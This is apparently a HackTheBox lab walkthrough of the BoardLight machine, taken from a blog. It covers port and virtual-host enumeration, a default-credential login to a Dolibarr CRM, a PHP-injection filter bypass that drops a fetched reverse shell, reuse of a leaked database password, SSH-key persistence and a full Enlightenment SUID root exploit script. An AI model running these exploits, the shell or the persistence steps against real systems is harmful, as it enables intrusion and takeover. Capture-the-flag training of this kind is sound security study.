HackTheBox | BoardLight

In this walkthrough, I demonstrate how I obtained complete ownership of BoardLight on HackTheBox
In: HackTheBox, Attack, CTF, Linux, Easy Challenge
Owned BoardLight from Hack The Box!
I have just owned machine BoardLight from Hack The Box

Nmap Results

target="10.129.139.70"
sudo nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt $target
# Nmap 7.94SVN scan initiated Tue May 28 16:37:38 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.139.70
Nmap scan report for 10.129.139.70
Host is up (0.017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 28 16:38:20 2024 -- 1 IP address (1 host up) scanned in 42.58 seconds





Service Enumeration

TCP/80

We can see board.htb on the page, so let's add it to our hosts file
echo -e '10.129.139.70\tboard.htb' | sudo tee -a /etc/hosts
Still the same output, carry on

Gobuster Enumeration

Directories and Files

gobuster dir -u http://board.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php,html,txt -t 100 -o gobuster_80.txt
/about.php            (Status: 200) [Size: 9100]
/css                  (Status: 301) [Size: 304] [--> http://board.htb/css/]
/do.php               (Status: 200) [Size: 9209]
/images               (Status: 301) [Size: 307] [--> http://board.htb/images/]
/index.php            (Status: 200) [Size: 15949]
/js                   (Status: 301) [Size: 303] [--> http://board.htb/js/]

Nothing new discovered here



Virtual Hosts

# --domain : base domain of the target
# --append-domain : append the base domain on the end of ever wordlist item
# -w : the wordlist to use
# -t : how many concurrent threads
# --delay : add a brief delay between requests to go easy on the server
# --exclude-length : the server responds with a lenth of 301 for invalid names
gobuster vhost -k --domain board.htb --append-domain -u http://10.129.139.70 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 200 --delay 10ms --exclude-length 301
Found: crm.board.htb Status: 200 [Size: 6360]
echo -e '10.129.139.70\tcrm.board.htb' | sudo tee -a /etc/hosts



CRM Enumeration

dolibarr 17.0.0 cve before%3A2024-05-01 - Google Search

Filter results, such that we don't include any HTB user content

Security Advisory: Dolibarr 17.0.0 PHP Code Injection (CVE-2023-30253) - Swascan
Swascan Offensive Security Team has identified a vulnerability on Dolibarr 17.0.0. The vulnerability can be tracked with id CVE-2023-30253. The vulnerability has been fixed in Dolibarr 17.0.1. Product description Dolibarr ERP & CRM is a modular software of business management which adapts to the size of the company (SME, Large companies, Frelancers or associations). Technical […]
So, we're going to need a credential...

Recall from before that we saw an email of info@board.htb, so that is one possible credential for the CRM. However, I did find that admin:admin allows us to login as well.



Testing the Exploit

💡
Our admin user has the ability to create and edit sites and pages. The premise of the vulnerability is that the application attempts to block an unprivileged user from running PHP scripts by blocking <?php in the site source code. However, we can bypass the PHP code restriction by simply specifying a <?PHP uppercase tag.
Click Websites and click the + button to add a website
Fill out accordingly and click Create
Click the + to add a Page
Fill out accordingly and click Create
Click Edit HTML Source
As noted into the POC, we get an error with <?php
But bypass with <?PHP
Click the Binoculars icon to preview the page for easy execution
Note: There appears to be cleanup script that runs to remove these pages at regular intervals, so if you see an error similar to below, just recreate the site and page and try again.
The phpinfo() function executes as expected





Exploit

Reverse Shell

php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shell
Contribute to pentestmonkey/php-reverse-shell development by creating an account on GitHub.
wget https://github.com/pentestmonkey/php-reverse-shell/raw/master/php-reverse-shell.php -O sh.php
nano sh.php
Update line 1 with the uppercase PHP
We need to update lines 49 and 50 with our listener IP and port
sudo rlwrap nc -lnvp 443
Create your test page and paste in the PHP reverse shell, save the page, and preview





Post-Exploit Enumeration

Operating Environment

OS & Kernel

Linux boardlight 5.15.0-107-generic #117~20.04.1-Ubuntu SMP Tue Apr 30 10:35:57 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux

NAME="Ubuntu"
VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.6 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal    

Current User

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Sorry, user www-data may not run sudo on localhost.   



Users and Groups

Local Users

larissa:x:1000:1000:larissa,,,:/home/larissa:/bin/bash    

Local Groups

adm:x:4:syslog,larissa
larissa:x:1000:    



Network Configurations

Network Interfaces

eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b0:b9:89 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.129.32.44/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 3421sec preferred_lft 3421sec
    inet6 dead:beef::250:56ff:feb0:b989/64 scope global dynamic mngtmpaddr 
       valid_lft 86399sec preferred_lft 14399sec
    inet6 fe80::250:56ff:feb0:b989/64 scope link 
       valid_lft forever preferred_lft forever    

Open Ports

tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -



Interesting Files

/var/www/html/crm.board.htb/htdocs/conf/conf.php

$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';    





Privilege Escalation

Dump the Database

During the post-exploit information we found the database credential for the dolibarr user in one of the configuration files.

💡
Configuration files are often a great first place to look when landing on a box, as they may contain credentials and other hard-coded information that helps us further our mission.
List the available databases
Use the dolibarr database and list tables
Dump the records from the lx_user table
We already know admin password, let's try and crack SuperAdmin
⚠️
I didn't have any luck cracking this hash, but it's also worth checking if the database password is reused as a user password.



Lateral to Larissa

su larissa

Test for password reuse

Easy win!

Create a SSH Key File for Persistence

ssh-keygen -t rsa -b 4096 -C '' -N ''

Run on Kali to generate a SSH key pair

cat id_rsa.pub

Copy the public key string to your clipboard

echo '... public key string here ...' > /home/larissa/.ssh/authorized_keys

Add your SSH public key to Larissa's authorized keys file

ssh -i id_rsa larissa@board.htb

Now, use your private key back on Kali to log in over SSH



Escalate to Root

find / -perm /4000 2>/dev/null

List SUID binaries as part of post-exploit enumeration

/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset

I'm not familiar with these SUID binaries, but they are owned by root, research time

enlightment_sys privilege escalation - Google Search

Search Google for privilege escalation using this SUID binary

A vulnerable version is installed!
GitHub - MaherAzzouzi/CVE-2022-37706-LPE-exploit: A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04)
A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04) - MaherAzzouzi/CVE-2022-37706-LPE-exploit



Exploitation

The vulnerability occurs due to the way the enlightment_sys component handles paths that start with /dev/.. as this will cause a path traversal back to system root and allow a malicious user to exploit a program in a writable path somewhere below the root / directory.

nano /tmp/pwn.sh
#!/bin/bash

echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
	echo "[-] Couldn't find the vulnerable SUID file..."
	echo "[*] Enlightenment should be installed on your system."
	exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
bash /tmp/pwn.sh



Flags

User

b3e9e7d4e2f3671c35e6a49e2440fb98    

Root

648dd6401e5ae0d7122776b67fed5724    
More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.